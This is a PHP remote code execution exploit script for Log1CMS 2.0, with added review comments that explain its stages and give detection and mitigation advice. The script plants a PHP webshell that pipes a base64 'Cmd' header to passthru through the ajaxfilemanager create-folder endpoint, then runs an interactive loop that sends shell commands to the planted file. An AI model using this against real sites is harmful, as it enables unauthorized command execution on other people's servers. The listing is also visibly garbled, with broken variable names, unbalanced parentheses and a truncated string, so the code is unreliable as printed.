<? Php
/*
+ ----------------------------------------------------------- +
+ Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution +
+ ----------------------------------------------------------- +
Search: Log1CMS 2.0
Developer: http://log1cms.sourceforge.net/
Defect type: Remote Code Execution
Author: Adel SBM www.2cto.com www. The-code.tk
Test Platform: Windows XP SP2
+ ----------------------------------------------------------- +
+ VIVE Algeria +
+ ----------------------------------------------------------- +
*/
// Runtime setup for a command-line script: error reporting is switched off,
// the execution time limit is removed, and the default socket timeout is set
// to 5 seconds.
// NOTE(review): this listing was mangled in extraction (spaces inside variable
// names and escape sequences, altered keyword casing, unbalanced parentheses)
// and does not parse as PHP as printed. The code lines are kept exactly as found.
Error_reporting (0 );
Set_time_limit (0 );
Ini_set ("default_socket_timeout", 5 );
/**
 * Sends one raw HTTP request and returns whatever the server sends back.
 *
 * Opens a plain TCP connection to port 80 of the host (no TLS), writes the
 * packet as given, and returns the result of stream_get_contents() on the
 * socket. The script terminates with a "No Response" message when the
 * connection cannot be opened.
 *
 * Because the traffic is cleartext HTTP, both the request and the response
 * are visible to network sensors and reverse-proxy logs.
 *
 * @param string $host   Host name to connect to (taken from the command line).
 * @param string $packet Complete request text: request line, headers and body.
 * @return string|false  Raw response text, status line and headers included.
 *
 * NOTE(review): the socket is never closed explicitly.
 */
Function http_send ($ host, $ packet)
{
If (! ($ Sock = fsockopen ($ host, 80 )))
Die ("\ n [-] No Response From {$ host}: 80 \ n ");
Fwrite ($ sock, $ packet );
Return stream_get_contents ($ sock );
}
// Credit banner printed on every run.
Print "\ n + -------------------------------------------------------------------------- + ";
Print "\ n | Log1CMS 2.0 Remote Code Execution Exploit by Adel SBM | ";
Print "\ n | SPl ThanX To: EgiX (exploit founder end coder)-The DoN | ";
Print "\ n | Greetz to: Over-X & ind0ushka... | ";
Print "\ n | TeaM Official website: www.2cto.com | ";
Print "\ n | VIVE Algeria | ";
Print "\ n + ------------------------------------------------------------------------ + \ n ";
// Argument check: the script expects two arguments after its own name
// (used further down as host and path). With fewer, it prints the usage
// text and exits.
// NOTE(review): the "Usage" line is truncated in this listing (its string is
// never closed), another sign that the page text was damaged in extraction.
If ($ argc <3)
{
Print "\ n + -------------------------------------------------------------------------- + ";
Print "\ n | Usage...: php $ argv [0]
Print "\ n | Example...: php $ argv [0] www.2cto.com/| ";
Print "\ n | Example...: php $ argv [0] www.2cto.com/log1cms/| ";
Print "\ n + ------------------------------------------------------------------------ + \ n ";
Die ();
}
// Host and base path are taken directly from the command line.
$ Host = $ argv [1];
$ Path = $ argv [2];
// Stage 1: a form-encoded POST to the ajaxfilemanager "create folder" endpoint.
// The "foo" field carries a PHP snippet that prints a "_code_" marker and hands
// the base64-decoded value of a "Cmd" request header to passthru().
// NOTE(review): the vulnerable server-side code is not shown on this page.
// Presumably the endpoint writes request data into inc/data.php unfiltered;
// confirm against the Log1CMS / ajaxfilemanager source.
// The request carries no cookie or credential header, so the script evidently
// relies on the endpoint being reachable without authentication.
// Detection: a POST to .../ajaxfilemanager/ajax_create_folder.php whose body
// contains a PHP open tag is a strong signal in web-server or WAF logs.
$ Payload = "foo = <? Php error_reporting (0); print (_ code _); passthru (base64_decode (\ $ _ SERVER [HTTP_CMD]); die;?> ";
$ Packet = "POST {$ path} admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0/r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";
Http_send ($ host, $ packet );
// Stage 2: a request template for inc/data.php. The "Cmd" header holds a
// sprintf placeholder that is filled with a base64-encoded string per request.
// Detection: GET requests to .../ajaxfilemanager/inc/data.php that carry a
// non-standard "Cmd" header with a base64 value, and responses containing the
// literal "_code_" marker.
// Mitigation: remove the ajaxfilemanager directory or restrict it to
// authenticated administrators, make sure request data can never be written
// into a .php file under the web root, and inspect inc/data.php on any host
// that exposed this component.
$ Packet = "GET {$ path} admin/libraries/ajaxfilemanager/inc/data. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
// Interactive loop: reads one line from STDIN per pass and stops on "exit".
// Otherwise it sends the templated request and prints whatever follows the
// "_code_" marker in the response, or terminates with "Exploit failed" when
// the marker is absent.
// NOTE(review): the condition and the match/print expression below are
// garbled in this listing (unbalanced parentheses) and are kept as printed.
While (1)
{
Print "\ n @ AdelSBM #";
If ($ cmd = trim (fgets (STDIN) = "exit") break;
Preg_match ("/_ code _ (. *)/s", http_send ($ host, sprintf ($ packet, base64_encode ($ cmd), $ m )?
Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}
?>